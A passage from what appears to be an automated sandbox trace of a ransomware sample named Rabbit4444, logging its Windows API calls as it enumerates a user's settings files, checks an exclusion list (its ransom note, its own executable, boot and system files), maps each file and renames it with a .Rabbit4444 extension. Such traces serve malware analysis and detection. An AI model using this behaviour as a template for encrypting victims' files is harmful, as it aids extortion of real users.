(lpString="Rabbit4444") returned 10 [0058.401] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.401] lstrlenW (lpString=".dll") returned 4 [0058.401] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.401] lstrlenW (lpString=".lnk") returned 4 [0058.401] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.401] lstrlenW (lpString=".ini") returned 4 [0058.401] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.401] lstrlenW (lpString=".sys") returned 4 [0058.401] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.401] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{141d98ad-3e07-4c44-a578-4dca078286a4}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.401] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.401] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14971197316) returned 1 [0058.401] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1020) returned 1 [0058.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0058.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0058.401] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0058.403] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0058.403] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.404] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.404] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.404] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.404] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.404] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.404] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.404] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.404] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14971472951) returned 1 [0058.404] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0058.404] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0058.404] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.404] CloseHandle (hObject=0x298) returned 1 [0058.404] CloseHandle (hObject=0x278) returned 1 [0058.404] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms.Rabbit4444") returned 192 [0058.404] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{141d98ad-3e07-4c44-a578-4dca078286a4}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{141d98ad-3e07-4c44-a578-4dca078286a4}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.405] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x458f3765, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x458f3765, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2241abe6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms", cAlternateFileName="CLCCAE~1.SET")) returned 1 [0058.405] lstrcmpiW (lpString1="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.405] lstrcmpiW (lpString1="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.405] lstrcmpiW (lpString1="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.405] lstrcmpiW (lpString1="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms", lpString2=".") returned 1 [0058.405] lstrcmpiW (lpString1="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms", lpString2="..") returned 1 [0058.405] lstrcmpiW (lpString1="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms", lpString2="windows") returned -1 [0058.405] lstrcmpiW (lpString1="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.405] lstrcmpiW (lpString1="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.405] lstrcmpiW (lpString1="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms", lpString2="boot") returned 1 [0058.406] lstrcmpiW (lpString1="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.406] lstrcmpiW (lpString1="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.406] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms" | out: lpString1="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms") returned="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms" [0058.406] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.406] lstrlenW (lpString="Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms") returned 64 [0058.406] lstrlenW (lpString="Rabbit4444") returned 10 [0058.406] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.406] lstrlenW (lpString=".dll") returned 4 [0058.406] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.406] lstrlenW (lpString=".lnk") returned 4 [0058.406] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.406] lstrlenW (lpString=".ini") returned 4 [0058.406] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.406] lstrlenW (lpString=".sys") returned 4 [0058.406] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.406] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{14dec75c-d6ce-44a9-8349-ad0f46ef96be}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.407] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.407] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14971734006) returned 1 [0058.407] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1086) returned 1 [0058.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0058.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0058.407] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0058.408] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0058.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0058.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0058.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0058.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0058.409] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14971988341) returned 1 [0058.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0058.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0058.409] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.409] CloseHandle (hObject=0x298) returned 1 [0058.409] CloseHandle (hObject=0x278) returned 1 [0058.409] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms.Rabbit4444") returned 192 [0058.410] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{14dec75c-d6ce-44a9-8349-ad0f46ef96be}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{14dec75c-d6ce-44a9-8349-ad0f46ef96be}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.421] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45a4ac94, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x45a4ac94, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2211fcec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms", cAlternateFileName="CL59A5~1.SET")) returned 1 [0058.421] lstrcmpiW (lpString1="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.421] lstrcmpiW (lpString1="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.421] lstrcmpiW (lpString1="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.421] lstrcmpiW (lpString1="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms", lpString2=".") returned 1 [0058.421] lstrcmpiW (lpString1="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms", lpString2="..") returned 1 [0058.421] lstrcmpiW (lpString1="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms", lpString2="windows") returned -1 [0058.421] lstrcmpiW (lpString1="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.421] lstrcmpiW (lpString1="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.421] lstrcmpiW (lpString1="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms", lpString2="boot") returned 1 [0058.421] lstrcmpiW (lpString1="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.421] lstrcmpiW (lpString1="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.421] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms" | out: lpString1="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms") returned="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms" [0058.422] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.422] lstrlenW (lpString="Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms") returned 64 [0058.422] lstrlenW (lpString="Rabbit4444") returned 10 [0058.422] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.422] lstrlenW (lpString=".dll") returned 4 [0058.422] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.422] lstrlenW (lpString=".lnk") returned 4 [0058.422] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.422] lstrlenW (lpString=".ini") returned 4 [0058.422] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.422] lstrlenW (lpString=".sys") returned 4 [0058.422] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.422] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{16c327fa-d8a8-41c0-b022-64ac67715327}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.422] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.422] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14973324522) returned 1 [0058.423] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=926) returned 1 [0058.423] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0058.423] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0058.423] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6a0, lpName=0x0) returned 0x298 [0058.425] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a0) returned 0x70000 [0058.426] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.426] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0058.426] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.426] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.426] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.426] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.426] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.426] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0058.426] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14973681047) returned 1 [0058.426] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0058.426] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0058.426] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.426] CloseHandle (hObject=0x298) returned 1 [0058.426] CloseHandle (hObject=0x278) returned 1 [0058.426] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms.Rabbit4444") returned 192 [0058.426] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{16c327fa-d8a8-41c0-b022-64ac67715327}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{16c327fa-d8a8-41c0-b022-64ac67715327}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.427] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c1491b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x45c1491b, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231aa1ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x361, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms", cAlternateFileName="CL69D2~1.SET")) returned 1 [0058.427] lstrcmpiW (lpString1="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.427] lstrcmpiW (lpString1="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.427] lstrcmpiW (lpString1="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.427] lstrcmpiW (lpString1="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms", lpString2=".") returned 1 [0058.427] lstrcmpiW (lpString1="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms", lpString2="..") returned 1 [0058.427] lstrcmpiW (lpString1="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms", lpString2="windows") returned -1 [0058.427] lstrcmpiW (lpString1="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.427] lstrcmpiW (lpString1="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.428] lstrcmpiW (lpString1="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms", lpString2="boot") returned 1 [0058.428] lstrcmpiW (lpString1="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.428] lstrcmpiW (lpString1="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.428] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms" | out: lpString1="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms") returned="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms" [0058.428] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.428] lstrlenW (lpString="Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms") returned 64 [0058.428] lstrlenW (lpString="Rabbit4444") returned 10 [0058.428] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.428] lstrlenW (lpString=".dll") returned 4 [0058.428] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.428] lstrlenW (lpString=".lnk") returned 4 [0058.428] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.428] lstrlenW (lpString=".ini") returned 4 [0058.428] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.428] lstrlenW (lpString=".sys") returned 4 [0058.428] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.428] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.428] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.428] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14973924307) returned 1 [0058.429] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=865) returned 1 [0058.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0058.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0058.429] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x670, lpName=0x0) returned 0x298 [0058.430] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x670) returned 0x70000 [0058.431] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.431] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.431] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.431] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.431] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.431] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.431] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.431] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.431] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14974195560) returned 1 [0058.431] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0058.431] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0058.431] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.431] CloseHandle (hObject=0x298) returned 1 [0058.431] CloseHandle (hObject=0x278) returned 1 [0058.432] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: 